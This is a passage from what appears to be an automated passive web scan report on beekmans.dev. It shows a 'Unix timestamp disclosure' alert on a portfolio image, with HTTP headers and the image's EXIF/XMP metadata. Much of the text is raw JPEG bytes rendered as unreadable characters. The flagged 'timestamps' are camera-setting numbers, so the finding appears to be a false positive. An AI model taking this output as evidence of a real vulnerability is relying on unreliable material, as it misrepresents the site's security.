          0]¥ˆãЂ¤¹¹Y62!*©õÀÅSeÚÀdsŽjWC‚ͱV)V«.fÞ­þ#ÖéÏìꭟ7~IíŒb­>«i%†'LA± œ}HŸåôøÎêk.ÜsFArE±,Eh-?O멤uXâbö°º³Î&pìàçhöäÔSÞÀе¼:Ç$†G.FsØaÏçTÊaTäޔãà àÚ’„QO^I§úZõ4_WCum(…Œq[ˆ]IûÃÐК¬F¶©†×c«îa½·wô㳚= Á°pqڑÓap9È£’<V!]ßòþº%¿®-<¸ØCjPHÜÜä“Ks¨­Î£-ÈF@òyŠ22>¿•SX‹ó[î©ï@OÝù›†ŽôùbG¶¬þzýËüŽž-R6Ý,Qº¼’	$9ÀöÍC}wˆÇQ·°r?Ç¥g‰~Ëm¤a gÃ,¹’yã½E*)K˜ëÆæ2/džûÿ‘#^B¼»>£¥0ê)ýÓÏ\<›u»àýìdR–¶Ì*z®“Ä/Óvy­e"Éå9¬o*ÞO¸¿÷É­-%BÁ 
          ‘º¢[ûT2T¤ÔoÍfYU‡4Ú{Ži˜¦HÒ(ÿ*B±ړɗþy?ýóK™w5ö5ÙpÚCOòeÿžOÿ|škÆëË#(÷¦š¥Q+¸¿¸fi)i)™…–Тނ€'³µ72`ä"ýãý+VP¬ŸeåpAèƒÔÔp…³±ÜÐ77¹ô¨cÈ	\í<çԞŠ+†rs•ú#ì0Ôaƒ£m{ÓW—’íåÖþJO±$QÅ
          !Shiåè~žµ]Û¯k‰¿Ý;òª—7/rùn}Ô¥†ÊY“zíUÏ›­}šJóg›,lêKÙaat¼¿M­ëwæYvǤ—1{ïÜ*ÂM$i¿rÍ÷㏪ÿ…gËa4q™ÆUëµ³ŠŽ	ä·pñ¶qØÐéÆKÝw1õðõkǗÓOÃgø?3fH⻇k`©v÷‹<
          o)»t>¢´¡‘T¤±qǸÿàjõ×Ú/—´!#'­MhÊËc£6•
          ÔIiS˪ÿ+j¾îåLsE/zJì>`))x£h£Š((4´P!(ÅPHii
          QE0
          Žyqƒ‚X‚ì3Rf¡Ÿ
          µIJV¹Q“‹º#iÔïeRÆ úR<ÊÛÊ©
          'ÞÉà})¯Mœ†/Ð
           ÊÛNM‘ÔçQ§ý[Š’&ÕWRv®_cH$æBܗ~´4,X1qGJF‹êÊN3Óž„·Sî’¨YIhþîë@˜|®A.£ö4ÃùyŒç¶1šx+ó‚­ÑºQd>j‹åýñ*Œ6ð»G§Ö“Í_½ƒ¿nßoLÓLDHÊXazµ5×a¨# ŽôY	΢ZiTî`§{JjºìØà‘œŒR´eA;+÷€íHѐT·LSЖç}GUùu<6F?•$r~ô±ݜÓY0¹ƒŽÔè£$Ž@' õ¢ÊÀœÜÑ •U¶àíÁõ²‡ (áirdqڛåœuÆqI%¸å9µÊ.ðYòѼ©n)¥~PÙiJ##¨ªÐÊò
          ÿ8lp;PÆÒ3ž)
          àsŸJz¨_BAÁ£@WlP7}áÆsÅ)e{×4ŽØpj<dÏJV¹n\º!ÆLœ‘È4ÃÍ(\ãžOAI—9ªÐɹ=ÁNiAÁ(ÛÇ^qœRcåÎh¨z¶O>¹ žM"®	ç‘ÔRãý¡Hµ{rlÒdcn{u«‘ù|uªø\â’w.pqž˜ç>cœæ”¨x¥Ú1žÔÌìÄ!rqŠ@~cž3švьö (=9 ,Ã#sÛ­۞ÝhÂѰŒPV¢—í¥“œäö¥Ø3ŒsFÁœcš4RCNšä.E§lÆ9£`Î1ÍBq×9#ð*vaëÁ\gð¦$j_}jôÐÛýœmûޕœ¤“Hë¡FsŒ¥tP¡<½ÃyíŸò)®FAÎÑɧˆÁ$I,a³€N*®ŒdՆîcîT’E<:ÆYƒÜÀ€=3š ÙÀ'hX•*	‡b¢¦¶þºÅU
          ¼Œcқ#8@
          H"V€Hè)]À¾´]„Ú3…€òÇ#¹Ç¥>Ñ¡Ã`áƒcó¦ùK·vßZµ¬pœ[Ÿ­8Ù²j9E]ÿWV$‘ÄdŸÎ—2X*Ԛhàî<ž£ž•"í=sZœ´ôIóþ}©H `»m#ŒÿŸþµ*‚`1§½
          Ø$õÁû¿çñ 
          —Ê	e;[ۏήhÎíÁÎHaM?0¯áVtÔQæíõþµØqÜ´j&©ˆö¨˜VF„-Qš•…DÔÉ$¹‘Ä̰t>Ôè!šdÞfe^ܞj;¯õíôÊ­Ù¾ëu#oZå›q¤œO¤Áӎ#0©
          ­ÚòÒï¹Rág·`¬AèA4ŠîöÓbØÛÔç½M¨¿ÜL\Õx¿ãÞ¢ÿ:¸>jjO}?3›K:Po–ÒÝÿq‘QRyŽÏÔRýš_î~¢¶çsÌúµäs"¢¥û4¿ÜýEf›ûŸ¨£ž=Ãêµÿ‘ý̊Ÿï™±`)ͪ¥Šp:ò)±?—*9΁4^ëA*r§R*ªkÕt5n˜f%?w~æúš¥rì¶q'ñJLRµ¹}ª…pŒž¼T7œ¥»v1Šæ¥“þ·>‡0ÄB¬*Ô¤î¶ù{·þ¼Ê¹©œÌð¤f6*Ÿwå5ëSýáüëfi#vQ’ 3ZU©ÈÒ±Á–àV&I9¸¥½•î·ý
          ˆëÎQ†c㎵LÖÌ4°$Œ0[Ò²®¿ãê_÷*U§$Ѧcƒ…-)ÂW^–ßRk3æE<ð˹}ˆ¦^)óVR1æ¨oÇÓ¬8™Û²ÆÄÓ¯³¶Ù?ˆGþïj¶3pç˹žëo¿Oý)”¨©¾Ë7÷?QGÙfþçþ<+^x÷<ïª×þG÷2JŸì³sõ%¬%ge‘>Y 6¡ÔŠW¹Tð•¥5E«év™RŠÒŽ(Úbâ4}ª¡‚ýÝÄóÂ¢^Xq˜>H2ô¨öË]—–Í8ûÊ͵÷~¯]
          T•pkR#X̊	‘X|ßQSxÜ8T”˜8ÇçC¬–á¶uâú'÷§§­Õ½Y›E]”Ç´©6ùJ€G
          •`EyV>dPŒã#$Pë$¯aÇ-”¥Ê¤¿áÓkïHͤ«ÄÇ)XUƒÌˆãÒ«\ ŽâD_º­Wó;µð®”y¯}¿tEEV‡ ”×PØÉˆ§SXûMf²’>éÈæ¢“lk"‡]†ì=éì1’¼úŠjªÈ	 ð)Iu7¥'ð!вBÙÈ	ƒŽÝiµ!òÃ%²qô©|•Ù¿o­!…BoÁÛëQtt8NÖºùÍó|¬›séÅ2Bhƒ’HéÍHbP»ˆ!}i%P‚ïBhRŒÚwZIFá‡è{S€(ÎÁ×ךD¬	PHЈH’i«%7óÿ;ƒ20†Aøçš@áL'®ÑÏçJȪpÜjq´h&§ë½Æ¶ÕB¡ƒdçŠ|L»‘²>Q‚)jßtSÙ¤-.ғIJ•D•ŠÌFשŗ!óÑqz±y+.¥WØ1œSM5qT„¡7Ã3û¼wÍ8²å›?xt¥­Ðf€€ôZ%!»€Tõ—pRNs“FÕ4Q׊4¼!À
          ƒœš@~VúS¶ŒgµAéÍ+¸€Œ«g éMþ;æž”¥123»=ºSsòû柴M£ Vb®2Ç=i
          K!?7J¤YëSÍ©²¤å܁²SOzoü´¤þmRF2–£ˆÂz旸=¶Ó(§by‡÷'¶Ú@2„¹¦Ñ@sÏïiW!px'8üª:(°Ô‰…¾)FvíŠ–‹
          L“›‹?Ü+ü[GGE+œ”ä®ÑË`f¤“-ђF2Ò«TŒ~JMFz1ÒeÁÉÝÎ>”®çg$?8¨3Š\Ñb}¥ïæNÙwRœ€ç8úÑË<lŸt1ü9¨(£”¯k®Å’ñ2ýÐNO§4õˆãîëØzÕ|ўԹFªù"·;<¼gðéùÕ°pÄwíYÉ˨'ŒŠ¼Än;Iä÷«Š±Ióù@ËŽôõ$œ\cÀA MØÝ×éTdKÀÆ[>€w¤ÞJåyÜ9Ð9$üǸïJØ à€i€å'ËwþµwNÎdçYÊó÷Gaž¿çó­4åä ½ê%°ã¹p­FëRÓXV&…VZÆ3VÝj¼£¯BbLžeØOïþU¢PF©	a,¬ÌÛ·Û'Û õoûæ¸jÆrI%±ö}l5T©9¤äßU·Bi£DÈzžžÆ³¢ÿQ?®ó«ŸoƒÕ¿ïš¨ïI|¶fi;À檊š\­v1ÌêaªÎ5iÍ6”“Õu‹·âAJ‚–»O”bŠ(x¤¢’€%µEpŽxÁ«W1n…š#¹}ÔÖ}\Šy$
          ýlCF†°©u${
          Е)aç×kyïóÑ5Ý«u*ÆÁdV=Ö£ÜÛ:²´£kµMàIòöü7ñDx#éU™JŸqD£­kf‹£_—FIEJ2ë«OúꞦ¤w± E”3šÌÃÎî½‰ŠŒç
          ¥°«	l°áîzÿc’hŒcIÞ÷lU±ŒÂœaÊ£õÙ/ë²mÈ@'
          pp?ÝïPÞÊ%¹b>èùEYh§‘^<ÖBçîAïYäpFíE+JNWÔ1îT¨BŠ‹Q}_[_ñ»m®—K Ÿ…´†ºÁÅ9$hó·p*~”Ú;RÜq“‹¼wæ0ËßH/&͕ÜÇ$í¨))8Åîcˆ«†M|ÉM̞W–
          F2'ñ¥[©”¡>EÚ¼v¨hÍ‘ìY?ýý¶%ŽæH”… ‚s†ç֓ϓŸ›9mäûÔY¢Ÿ,o{ÛÕ²3²ó'“.pTrNvŽ	ô¨	Ï9É4RP¢–ÈU+T¨’œ›°QEFALsÎ;{Óê7?1ö¦„79ýqMFÙ 8àäF<
          AÉ›Õ-Ŧ‡œï/üVíÓ§çHÙß#Ÿ¸SƒØñÀªäòFxÏJLž«>S©Ö¿O2ÉâY¾áǦ)®yź1àúóPg·j3G(TúNÿæL¡™bÙü,síÍ5d“oñ¶£Í%UŒý¦ßב#ð‘«uãÛ4æ4¬~é_J‡4f‹ŸúùXÑ®ÞÍÍ:3™ßo|â¡Í*}êgª6p õæƒ÷™¿„¯Çûԙ¡-)ûÌpDžäîæœùo»ÏÍÎ*:Jv'›Kg26;çÖá¼Óh¢Âr¹!êDZÐ	A^i´Q`r$o›îÿzƒÉ}j:(°ù‰:²‘ÐAÉR:
          eX9‰S¨#¦)á†:Ô+փI¢ã;!ý֛Ѕìzђ›¸BBrC‡P½ˆæŽá{b›¸ãn8Å;̇w+Û¥{MÜqŠ7b‹2ˆv)Œw<Ò$b€Ät¢ÁÌ®;;{g£•Ýߘ	=èÜsš,
          HðîïëKü;»àS7æÇ9¥b¹ÐóÀÜ:)ò±îЇqÎsÖ¤f;sëëI£HÍYƒ€•$ÿJ÷|¯oò)Øgž½s@vç¯<Ó±<葾F@ÁcŸð¥ûŒª£†'>üÔAØt>ô¡ÙF¥b½¢¹ ùYUºûó@áÖ?á+Ï¿½F”`þµØ.Üñô¥aª‹úü‰¢æxâÇÊ@ÏÙÍMœÕ1+.=*Øädt«JÆ5$¤)4ªx óžØ¦fœ0jŒÉ€@3ù
          ïc¸œ:bÉì4I!Úzmü¨øØHä³míÓ5§§£FïûÀÈWŒ6yúVT.½]3ý+KNT;FÄ©^ýje°Öæ!éGzCšÀԍ…W‘jÃ…ÅRQÅDjʅ…RÌÑHM¦!A§S)sÅ:Šnii¹¤4™¢€®ÙO)€ROÞ=êœhep¹Àî}­0õ8äv¨œT×+;0µêaf«ÅykøÿÚ†uܤ±ܧSËcå»ô‘*‘$ãšJ…E(¤Îš™IU•H+_³kñM_æ^7LGÍvô)‘ÜD’©
          pOÌìrßýj©EW²¬bó
          ÎJ]W{¿Í»|¬_¸¹X$anÃ,>`:ê=ê‰$óޜ#ÌEÁåO#Û֙NœTU‘¼EJò斉ê—E~ß=üÃ4¹¦ÑZBæŠJJ\њJJZ)(¦Fi( ¢ÒPÑIE.j´‰›Ðš°:ÕG9vúšhB’AÅ 4¤ðçBŒÓíþ±£ÀÙ³8Ç|g5 4¨­ÐžhiXägŽ9Å0Ž
          BFîi´ÿ¯BÄg͸
          ÇNJù‹¹€%IÇÕ‘‰ã<sA‘‰8ÇLR³-UõÔVbcW8-’3Ž´“­jk1lg·@#1c“Ö©#)NêރÉÌ#Ù½=©"8~܃MÉÛ·¶s@%NGZvОoy18ÿZO¢çô¨)èÇx9憇NVc۟˜ýìa?q»šŽüæšI'&’C”•Çg÷¨_õŸ7'9ïœÑ“œ÷§byµ>øúÐÔÈëš@pr(Ž”	1íòôîiåéÜÓCހÄQaó!q†on”½Fîø4ÐH9ïFãœÑ`RBç•=Í!ûÇëFI9¤ –î<íúRî>ߕ1O#ڗ4¬Zzy`÷â“Ê´úZ¢.3É´y=jAE¹‘ÏZ_ zԔP#û8ÏÞ ÁŽ„cRÑ@\‡È>Çñ¥íÏOnjjZrnØçñ [· >ù©és@\®-›Œîsҟöv*{œÔÀ҃JÃSh¯öWÆ03޹ïGÙÀÎ:ç½YÍ.h°¹ŠÆÍÈ ÇC»­]³ðõõülöñ®Õ8πjΗ§É¨Üm/28ì=½v*AEDUÅDåm
          #vq¿ð†j­ÀHG<8sOÿ„#Xlb(G?óØ+·Föý*ÊØ`V^іp
          àMh®VAÿ®Ã‘UotGH¶ßy„Î#nÇ×ê
          p85‰ÈÉ"+«u…U¡8\òbÝä3Žýk²Ôüå¥Ó¥9ÿ–dåOøW/}£êZk´Ú¶ÑüiÈ­£4ö2qh®ÇïQÈÇh¦‰•†ÓÅ/
          ÆsTI8m‘¨pwÎ*ö”WÏfSÁN;Ös1,v®@«Ú@ýìŸÂUzR–Ã[šÅ¨-L&“ŠÈÐ…BÍJÄÔLM1
          sP1§;TLj‘"Iš”°†5ۂíó®p)¢á·
          Á
          矐t¥vöGC¥µÊÏÒÿ¨ÌÒæ¤+hIIJþí.Û_ùë'ýñKvpþ­/æþ¿Ì‹4O‘#ï‰Ëàäb¡ÍRw1©	AÙÿ˜ìњfjXBäÈü¢rG©ì(nÊá9ÉEcäóøäoaØZ‡4Žìì]ŽKšnhвY©KÝÙh¿¯=ØìѺ›š3LÈvhÍ74f˜A I>o¸Ãk})’)ŽFFê§ó¦R¹ómÖOâåo§cý*ŽçD}ún=V«Ó¯ùýäy£4Üњ³œvhÍ35 Ó¤d@1aö‚:w¨”œvGV„j¦å+%o½ßÍ.YG"ŒÕ‰gº„€åpz ƒô¦}¶oï/ýð)''ª_ü•*0—,¥$ÿ¿ù"њ˜]Ü3R	=AS–€~ù•ßþyªŽ>¦‡).Ÿ×Ü\0ôf¯ÎÒ]\U¿ô¯ÁjSÍ©.ñç’PH¤T9«Nêç5X{9¸vc³IšLњfbæŒÓsE8ET?xçÖ¬ƒU3Mq§&`çíL54Q–#¡ÑÙd°$Ž=ªÄ:3Èd\žx«ÖvLøÈ5³og°
          –ÊW0âð˲ü÷(	îñU®´cjÅYÏ=ë‚m¦ËKŽEܧ¨"¥Hv8¿°
          ¸ó>o\R·ùõÅl_éÏlL‘åâýV³óZ+2ecd6¿Ÿ\R0:¾
          ²M&iŠå±ŸŸ>œP¶¡y-šŸ4™¢ÃRh€ÛŸ›žÔUÇ,IúT٤ͻ!û2ã–?•'ÙG÷ÿJž’€¹·_R)
          ºö$TԔÈ~οÞ?•g_ïʦ¤ D^Bã©£È\u5%ä~B㩤òTw&¤¤ .4D õ4ykïN¢€»KIEKM¢Ž¥¦Š\Ð!ÔRQ@Å¥¤¢KIK@šZm--Y²³’úåaüLz(õ¨mà’êu†%Üìx®ÊÃLŠÊÜFŽ]½MD¥ÊTcrõ½•ºAùGsÜúš¶zƒøU%zùœÔ‹n½7þµÎìl^F„taJ™
          ¿Rj‚[(þ:”@ŸóÒ§B%šïvÀ§«ÛÍ’zb³Å¸Çúŧþz/åK@ÔÔGµ'ïñŽI9²t*Ø ö"³–ÝOÔýL–ê?å¨ÿ¾(Ðz™:ǃtH3ÀD2z\V£à½BĖ„¨;¨5ê+
          €?yÿŽÔ‚è_ÿ«FˆpLðéDöìRU ûе£HMñ¨kÖ¯t
          ?Q\NªO¨Ašäõo	[èàß[ɕn1ëZª‰èCƒFa4ÒÔÖcLf>´;T.Ô¬Õ51
          cQ±¥cQ“T"IŽv¸*<Ó¦?êÿÜiGcZÿÄcÁ šfêBÕF%…ÖÅT|ÁÀúS|™¿ç“þTÐßèí þF¢Þ}OçP¯wcªn±æOnþoȟȘÿË'ü¨™Â
          œ„êGvïPn?Þ?&êvwÔÍԊ‹P[ùÿÀš3LÝFjŒGæŒÓ3Iš“4™¦fÔüԐHL7Üqµ¾•hÍ&®¬T&á%%вmŸþzEÿ}ŠO³¿üô‹þþ
          ­š3JÒîkÏGù_ßÿšHÚ0	d9þëO¼?é-ôÊ«f¦¼?éOø*_i|ÿB¯F\ªÚÇò±Ü4`¡ã=Qºõ©þTó¬Ûø•¾ðúzÕ\Òf›Žºϗ–k™-¯ÓçÛȴפ±OV?y¿Â 'ƒLͦ’DT©*›ÿÀE›³ûóì£ùT9§Ý7úKþÊ¡Í(|(¬Kýôý_æ?4™¦æŒÕŽÍ¦fŒÐ"@jº­J§'ÕfÖÁ¥aÍ"†Õå<V݆‘Жñ«6Z9Çð­h¬cçΡȥm­’%:qïV7(þ4¦‹TÆß5­ÓûíùÖw.ÚEÿž‹Q4£ûëMxP~uB¿ÞoΘ‡³‚0YH=«ÿKS™mˆÏxóü«M£\ÿçL(ž­øš¤ì&®s FíMÍnÞéñÜÈBÈ;úÖ‘¼NQԆªw3jÃsFh¤¦ ¢’Š)(¢€
          J( ’Š(¤ÍPIFhÍ%¢Šm-%´´”PÒÒQ@¢“4´´´ÚZZZJ(iȍ#„E,Ìp¦Œ’äšÞÓ,~Ê¢i2ÿ|ÒnÃJ憓§¥„$±g3z{
          Ó2۟­f†ä{SÃc°®w®æËCL<y'pÀïO¦Þ«Ÿ­fn'²ô§ç?.~•<¥\Õ(ÇL÷æ¤YОÊ>µð€§‡ÁþøRåšâtìê½<L˜åük$;g¨ü©âBØäþí.QÜÙIâƵ2\GŸ½ŸÇXKœç·ûµ*¹þˆ)rŽæâÍçsOC·ïuéŠÃ»ªÿã•"µ?
          Vͱ$š²¼S$Røzr€ðËÎ}èBàõO]vmáH .·"œV¨Oc‹/ÅFÒR;TõÓcìõ51ž£/UbG–¦¦–¦–¦ÞjPñ’Tc!±IæCÿ<›þû¨R©åF¾Ú^_rÿ"Á’ùâß÷ßÿZ“͇þx·ý÷ÿÖªù£4r öÒì¾åþDí2˜ü´M œœ¶j=Õê7SJÄJnnì“u&êfê7S ~ê7Ty£4&ê3Qî£4ýÔn¦n£4ýÔn¦fŒÐ÷Qº™š3@ÍNóÃ#xŸq뵸ª™¥Í'Í!RPM/ÊåößóÊOûïÿ­Fûoùå'ý÷ÿÖªù£4r•íŸe÷/ò,o¶ÿžRßýjMöÿóÊOûïÿ­UóFhålû/¹‘,’™dg#Jni™£4Ò±”¤äÛ{±ù£4Ìњbš3MÍ 	ü߅kX8VMº™%Ú98­Ë->N	$
          —a£ µ•vÅ[I—Ò³a€Æ£÷„þh‹5E¿=;ƒŸ¥DóǞ‡ò¨EÿžQ<ƒ?xÑ`¹3L¾‡ò¨Ì럻úT%ÿÚ4Æ=ë•§ÜoÊ¢3c’:Œ¸þñ D†oö*µÔit›^<ÍÜSËÓK­01n-ä·l0ã±õ¨s[åº•nAíYw6†,¼2~¢´Nä4W¤£4•D‹IERQE”´”RQE%Q@’–ŠÿÙ
          Evidence
          134348800
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        30. GET https://beekmans.dev/img/portfolio/minor/blue/36-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          151388160, which evaluates to: 1974-10-19 05:16:00

          Request
          Request line and header section (265 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/36-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1158 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: image/jpeg
          Content-Length: 64833
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "fd41-5cfcb9beafa60"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 1099
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5huJF4cliNws1kNbVWT700RS%2B9LaiJ%2BMV5CuLOj75IUvrFH9Hr56jt0hnpGur5D3UUbJTgQDAjB937Lrl8lcOCFvqMCBhlaE44ehvtb3AQ3Dmsn2xi0BBywZD9W8yHQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47eb8004c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (64833 bytes)
          ÿØÿàJFIF``ÿá
          ÓExifII*íIÚŽàntƒ‹(1“2ži‡¦›œ‚²žœV4ŸœŠhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.CanonCanon EOS 700DÀÆ-'ÀÆ-'PhotoScape2018:06:03 23:07:25hacker in a jacket with a hood with a laptop sits at the table. data; danger; internet; code; concept; privacy; virus; network; security; computer; web; identity; attack; dark; crime; man; table; theft; cyber; hacker; online; anonymous; information; software; type; secure; laptop; professional; hack; password; hacking; safety; enter; criminal; prevention; notebook; phishing; using; worm; work; programmer; trojan; hood; illegal; system; antivirus program; person; fraud; background; deskhacker in a jacket with a hood with a laptop sits at the table. Added identity theft icons, account hijacking, bank data theft and world map.š‚ ‚("ˆ'ˆd0ˆ2ˆd02300D’
          X’`’
          h’p’	’
          ’x†’ð€ ÿÿ í I¢p
          ¢x
          ¢¤¤¤¤1¤
          €
          2¤
          4¤­
          5¤À
          È2013:12:29 00:53:532013:12:29 00:53:53Тt@Bϒi@B$ASCIISSUCv3H4sIAAAAAAAEAIVSy27DIBC8V+o/WJxtyQTsOPmHSr1HPWCztVGIsXikiiL/e8GPhERRKy7M7O4wu8v1/S1JUM2MaNA+uQbksZDSGauZFar3dJ4uPHBhlRZMBjJw4xRBxjLrDJhIohatsao5Dp2yyvNk1TCdsxb0FAx8JNMwC63XfxRavB1mnKyBKegrfAihNOKMqydupcb0j8pPUIOEV/Uf0N8l5svX2gNroW8uweQY2dcggc1TOMyp6PjjWz1N7SxJZ8FBRZg5LlTU7lk1TJqnwQxaNKJvozJlO9ARbvy+1CkiemUnJ8tsEPezDRATvN1U4RQU07IoK7Tu0C9E8NjrvNZO+JC+RB7dIBXjwO/Ui4XjYlORguwqchvu8+7nFJqTfM4Yb3/E1SfhMx9feF1Nt3n6jwlalGR5IRqqCOqoJDndMMqzbyghoxXfZazgZYZzUu8A57zGhf8H4y+wSCPvKQMAAA==O~¼4U373075006498(EF17-40mm f/4L USM0000000000ÿá:Îhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
          <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 4.1.1-Exiv2">
           <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
            <rdf:Description rdf:about=""
              xmlns:crs="http://ns.adobe.com/camera-raw-settings/1.0/"
              xmlns:xap="http://ns.adobe.com/xap/1.0/"
              xmlns:aux="http://ns.adobe.com/exif/1.0/aux/"
              xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
              xmlns:xapMM="http://ns.adobe.com/xap/1.0/mm/"
              xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
              xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
              xmlns:dc="http://purl.org/dc/elements/1.1/"
              xmlns:MicrosoftPhoto_1_="http://ns.microsoft.com/photo/1.0/"
             crs:RawFileName="IMG_5199.CR2"
             crs:Version="9.8"
             crs:ProcessVersion="6.7"
             crs:WhiteBalance="As Shot"
             crs:AutoWhiteVersion="134348800"
             crs:Temperature="6200"
             crs:Tint="+13"
             crs:Saturation="0"
             crs:Sharpness="25"
             crs:LuminanceSmoothing="0"
             crs:ColorNoiseReduction="25"
             crs:VignetteAmount="0"
             crs:ShadowTint="0"
             crs:RedHue="0"
             crs:RedSaturation="0"
             crs:GreenHue="0"
             crs:GreenSaturation="0"
             crs:BlueHue="0"
             crs:BlueSaturation="0"
             crs:Vibrance="0"
             crs:HueAdjustmentRed="0"
             crs:HueAdjustmentOrange="0"
             crs:HueAdjustmentYellow="0"
             crs:HueAdjustmentGreen="0"
             crs:HueAdjustmentAqua="0"
             crs:HueAdjustmentBlue="0"
             crs:HueAdjustmentPurple="0"
             crs:HueAdjustmentMagenta="0"
             crs:SaturationAdjustmentRed="0"
             crs:SaturationAdjustmentOrange="0"
             crs:SaturationAdjustmentYellow="0"
             crs:SaturationAdjustmentGreen="0"
             crs:SaturationAdjustmentAqua="0"
             crs:SaturationAdjustmentBlue="0"
             crs:SaturationAdjustmentPurple="0"
             crs:SaturationAdjustmentMagenta="0"
             crs:LuminanceAdjustmentRed="0"
             crs:LuminanceAdjustmentOrange="0"
             crs:LuminanceAdjustmentYellow="0"
             crs:LuminanceAdjustmentGreen="0"
             crs:LuminanceAdjustmentAqua="0"
             crs:LuminanceAdjustmentBlue="0"
             crs:LuminanceAdjustmentPurple="0"
             crs:LuminanceAdjustmentMagenta="0"
             crs:SplitToningShadowHue="0"
             crs:SplitToningShadowSaturation="0"
             crs:SplitToningHighlightHue="0"
             crs:SplitToningHighlightSaturation="0"
             crs:SplitToningBalance="0"
             crs:ParametricShadows="0"
             crs:ParametricDarks="0"
             crs:ParametricLights="0"
             crs:ParametricHighlights="0"
             crs:ParametricShadowSplit="25"
             crs:ParametricMidtoneSplit="50"
             crs:ParametricHighlightSplit="75"
             crs:SharpenRadius="+1.0"
             crs:SharpenDetail="25"
             crs:SharpenEdgeMasking="0"
             crs:PostCropVignetteAmount="0"
             crs:GrainAmount="0"
             crs:ColorNoiseReductionDetail="50"
             crs:ColorNoiseReductionSmoothness="50"
             crs:LensProfileEnable="0"
             crs:LensManualDistortionAmount="0"
             crs:PerspectiveVertical="0"
             crs:PerspectiveHorizontal="0"
             crs:PerspectiveRotate="0.0"
             crs:PerspectiveScale="100"
             crs:PerspectiveAspect="0"
             crs:PerspectiveUpright="0"
             crs:PerspectiveX="0.00"
             crs:PerspectiveY="0.00"
             crs:AutoLateralCA="0"
             crs:Exposure2012="+0.65"
             crs:Contrast2012="+14"
             crs:Highlights2012="+12"
             crs:Shadows2012="-15"
             crs:Whites2012="0"
             crs:Blacks2012="0"
             crs:Clarity2012="0"
             crs:DefringePurpleAmount="0"
             crs:DefringePurpleHueLo="30"
             crs:DefringePurpleHueHi="70"
             crs:DefringeGreenAmount="0"
             crs:DefringeGreenHueLo="40"
             crs:DefringeGreenHueHi="60"
             crs:Dehaze="0"
             crs:ToneMapStrength="0"
             crs:ConvertToGrayscale="False"
             crs:ToneCurveName="Medium Contrast"
             crs:ToneCurveName2012="Linear"
             crs:CameraProfile="Adobe Standard"
             crs:CameraProfileDigest="BA45C872F6A5D11497D00CBA08D5783F"
             crs:LensProfileSetup="LensDefaults"
             crs:UprightVersion="151388160"
             crs:UprightCenterMode="0"
             crs:UprightCenterNormX="0.5"
             crs:UprightCenterNormY="0.5"
             crs:UprightFocalMode="0"
             crs:UprightFocalLength35mm="35"
             crs:UprightPreview="False"
             crs:UprightTransformCount="6"
             crs:UprightFourSegmentsCount="0"
             crs:HasSettings="True"
             crs:HasCrop="False"
             crs:AlreadyApplied="True"
             xap:Rating="0"
             xap:ModifyDate="2018-06-03T23:07:25+03:00"
             xap:CreateDate="2013-12-29T00:53:53"
             xap:MetadataDate="2018-06-03T23:15:58+03:00"
             xap:CreatorTool="Adobe Photoshop CC 2017 (Windows)"
             aux:SerialNumber="373075006498"
             aux:LensInfo="17/1 40/1 0/0 0/0"
             aux:Lens="EF17-40mm f/4L USM"
             aux:LensID="231"
             aux:LensSerialNumber="0000000000"
             aux:ImageNumber="0"
             aux:ApproximateFocusDistance="372/100"
             aux:FlashCompensation="0/1"
             aux:Firmware="1.1.4"
             photoshop:DateCreated="2013-12-29T00:53:53"
             photoshop:LegacyIPTCDigest="FE4259D653B76A6D98332B527F221691"
             photoshop:ColorMode="3"
             photoshop:ICCProfile="Adobe RGB (1998)"
             xapMM:DocumentID="adobe:docid:photoshop:c3703942-52c7-11e8-bd54-e910d37672ae"
             xapMM:OriginalDocumentID="B5831E1C2251FE2C015A9161D841CB07"
             xapMM:InstanceID="xmp.iid:850b66c5-928c-764d-9853-2b1637019deb"
             dc:format="image/jpeg">
             <crs:ToneCurve>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>32, 22</rdf:li>
               <rdf:li>64, 56</rdf:li>
               <rdf:li>128, 128</rdf:li>
               <rdf:li>192, 196</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurve>
             <crs:ToneCurveRed>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveRed>
             <crs:ToneCurveGreen>
              <rdf:Seq>
               <rdf:li>0, 0</rdf:li>
               <rdf:li>255, 255</rdf:li>
              </rdf:Seq>
             </crs:ToneCurveGreen>
             <crs:ToneCurveBlue>
              <rdf:Seq>
